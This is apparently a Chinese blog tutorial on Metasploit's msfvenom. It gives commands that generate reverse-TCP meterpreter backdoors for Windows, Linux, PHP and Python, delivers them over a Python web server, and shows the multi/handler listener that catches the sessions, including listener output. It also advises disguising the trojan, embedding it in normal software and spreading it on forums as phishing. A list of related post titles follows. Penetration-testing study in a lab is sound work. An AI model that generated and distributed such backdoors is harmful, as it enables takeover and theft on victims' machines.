MsfVenom

首先msf就是Metaaploit,venom就是病毒。msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。进一步来说,msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。

Msfvenom使用

>生成后门

#msfvenom在bash shell里使用,不是msf终端,

如果我们不清楚msfvenom到如何使用,可以输入msfvenom -h来查看帮助,msfvenom支持各种操作平台,各种脚本语言的木马的生成,在生成时需要你指定一种类型,比如说你要生成windows的,或者是Linux的,等等。

windows可执行程序后门:msfvenom-p windows/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Linux可执行程序后门:msfvenom-p linux/x64/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
php脚本后门: msfvenom -p php/meterpreter/reverse tcp LHOST =<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
python脚本后门:msfvenom-p python/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

有关命令的一些参数:

在执行代码后我们查看一下生成的文件:

那么生成完成木马后门了,我们如何传输,就是如何将生成的exe可执行文件发送给目标机器,这里我们有一个通用的方法,就是利用python快速开启一个web服务,python3 -m http.server


之后我们打开一个网页,输入192.168.164.130:8000/demo.exe就会弹出一个下载提示,点击下载就完成了我们的一个木马传输。

需要注意的是:一定要输入自己kali的IP地址,还有就是冒号后面的端口靠一定要和你所开启的端口号一致,像是上面我们默认的开启的8000,然而你也可以自己设置开启的端口号,在命令后面加上端口号就行。还有为什么后面是加上/demo.exe就可以发现文件,是因为我们生成的木马文件一般都自动保存在了home目录,如果是在其他目录下,只需要在文件前面加上你自己保存的路径即可。

或者你还可以利用其他传播方式,比如说你对这个后门进行了免杀,伪装,或者是注入嵌入到其他正常的软件,然后在社区论坛,贴吧上面进行广泛的传播。这些就是钓鱼的一个方式。

>开启监听

>攻击机监听
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set Ihost 192.168.164.130
lhost =>192.168.123.159
msf6 exploit(multi/handler) > set lport 9999
lport => 9999
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.164.130:9999

上面我们是成功完成了一个木马后门的生成和传输,但是我们对于这个9999端口的监听并没有打开,我们需要进入msf来进行监听。

进入msf以后我们需要使用一个模块,use exploit/multi/handler ,这个模块就是为了去开启一个监听端口,然后我们需要对模块进行设置,首先要设置payload为我们生成后门时使用的payload相同,set payload windows/x64/meterpreter/reverse_tcp,设置lhost,set lhost 192.168.164.130,设置lport,set lport 9999,设置完成后我们可以查看一下:可以看到是没有任何问题的。

run运行模块就可以开启监听了,然后我们转到靶机运行一下demo.exe,返回kali可以看到我们直接获取到了一个meterpreter会话,拿到了权限。

Msfvenom查看

上面我们是针对windows来生成了一个木马后面,但是有时候我们不一定知道我们要生成的都有那些参数,比如说我们要攻击Android,我不知道要生成什么样的可执行文件,甚至我压根不知道payload要选什么,我怎么知道这个payload有这么几个参数要设置呢?那我们什么都不知道的情况下该如何查看我们所需要的内容,这时候msfvenom可以使用命令来进行查看:

#查看msfvenom支持的格式:msfvenom -l formats
#查看msfvenom支持的攻击载荷:msfvenom -I payloads    针对win:msfvenom -l payloads |grep windows
#查看msfvenom支持的编码:msfvenom -l encoders
#查看payload的信息与设置:msfvenom -p cmd/windows/adduser --list-options

>Linux

我们再来看一下对于Linux如何操作。其实和windows区别并不大

  1. msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.164.130 lport=8888 -f elf -o linux_demo.elf
  2. use exploit/multi/handler
  3. set payload inux/x64/meterpreter/reverse_tcp,set lhost 192.168.164.130,set lport 8888
  4. run
  5. python3 -m http.server
  6. 转到Linux靶机,wget http://192.168.164.130:8000/linux_demo.elf
  7. 运行linux_demo.elf

综上所述我们得到了两个meterpreter,分别是windows的和linux的。

渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)相关推荐

  1. 渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权)

    1.目标机器权限提升 权限提升(privilege escalation) : 攻击者通过安全漏洞把获取到的受限制的低权限用户突破限制,提权至高权限的管理员用户,从而获得对整个系统得控制权.Windo ...

  2. 利用msfvenom生成后门木马

    msfvenom工具介绍 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload an ...

  3. Kail Linux渗透测试教程之免杀Payload生成工具Veil

    Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具--Veil Kail Linux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用M ...

  4. mysql定时木马_Mysql的语句生成后门木马的方法

    咳咳,大家看看就好了,本人不负责所产生的后果 复制代码 代码如下: SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702 ...

  5. Msfvenonm生成后门木马

    目录 Msfvenom 生成exe木马 生成Linux木马 方法一: 方法二: 在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法.传送门-->M

  6. mysql 木马_用Mysql语句来生成后门木马方案

    下面的文章主要是介绍又如何通过MySQL(和PHP搭配之***组合) 的Mysql语句来生成后门木马的具体操作方法!以下的文章主要是通过相关代码的方式来引出Mysql语句生成后门木马的具体操作方案. ...

  7. 利用mysql上传木马_通过Mysql语句生成后门木马的方法_MySQL

    通过Mysql 的语句生成后门木马的方法! SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656 ...

  8. mysql上传木马_通过Mysql语句生成后门木马的方法_MySQL

    通过Mysql 的语句生成后门木马的方法! SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656 ...

  9. 网络安全之路:我的系统性渗透测试学习框架

    没有兴趣,何来成就,难道就只是为了咕噜猫?hahaha(听不懂吧,没关系,只是因为加密了,你能从我的笔记中找到答案么嘿嘿嘿嘿!!!) 注意:以下内容仅记录本人当时学习时任然不知的相关知识.笔记草率,可 ...

最新文章

  1. 状态模式的介绍及状态机模型的函数库javascript-state-machine的用法和源码解析
  2. 三四线城市高价房内幕:开发商坐庄,中介布局,购房者盲目下注
  3. 网易云携手美云智数掀起企业移动信息化发展新浪潮
  4. 【Android开发】NDK开发(3)-jni开发技巧
  5. django开源电子文档管理系统_「开源推荐」BookStack v2.8 发布,简洁美观的在线文档管理系统
  6. 前端学习(2379):加入git管理
  7. mysql-5.5.55 多实例安装总结
  8. HTML期末大网页作业-腾讯官网
  9. mysql锁总结知乎_MySQL锁总结
  10. 用matlab还原全息图像,一种全息再现图像的零级像消除方法与流程
  11. 如何彻底卸载Mysql数据库软件
  12. java 执行class文件
  13. Linux 数据校验md5sum
  14. 微信小程序-detail详情页静态页面搭建
  15. 神经网络学习的几种方法
  16. 机器学习 Cohen s Kappa,Quadratic Weighted Kappa 详解
  17. 打印图像模糊问题解决方法
  18. css3 立方体3d旋转效果
  19. Python应用开发
  20. 用PanDownload出现无法下载文件,资源分配失败

热门文章

  1. GeForce MX150相对应的NVIDIA CUDA版本_各品牌消费显卡大全(九)映众NVIDIA篇,喜欢的可以收藏...
  2. 自定义一个仿Spinner
  3. JS数组方法-改变原数组与不改变原数组的方法集合
  4. 建筑建模学习笔记4——室内放置物品/设置灯光/设置材质/渲染出图
  5. 国产手机中高端之争:比拼技术和渠道
  6. 不会被我遗忘的蒋阳,董悦,杨竞凯,万伟平以及其他亲爱的队友们 ...
  7. Java之PriorityQueue实现最大堆、最小堆
  8. 关于在vs2013中配置opengl红宝书第八版环境
  9. 户外高压线路防触电警示装置
  10. LaTeX使用(公式,表格,图片,中文字符)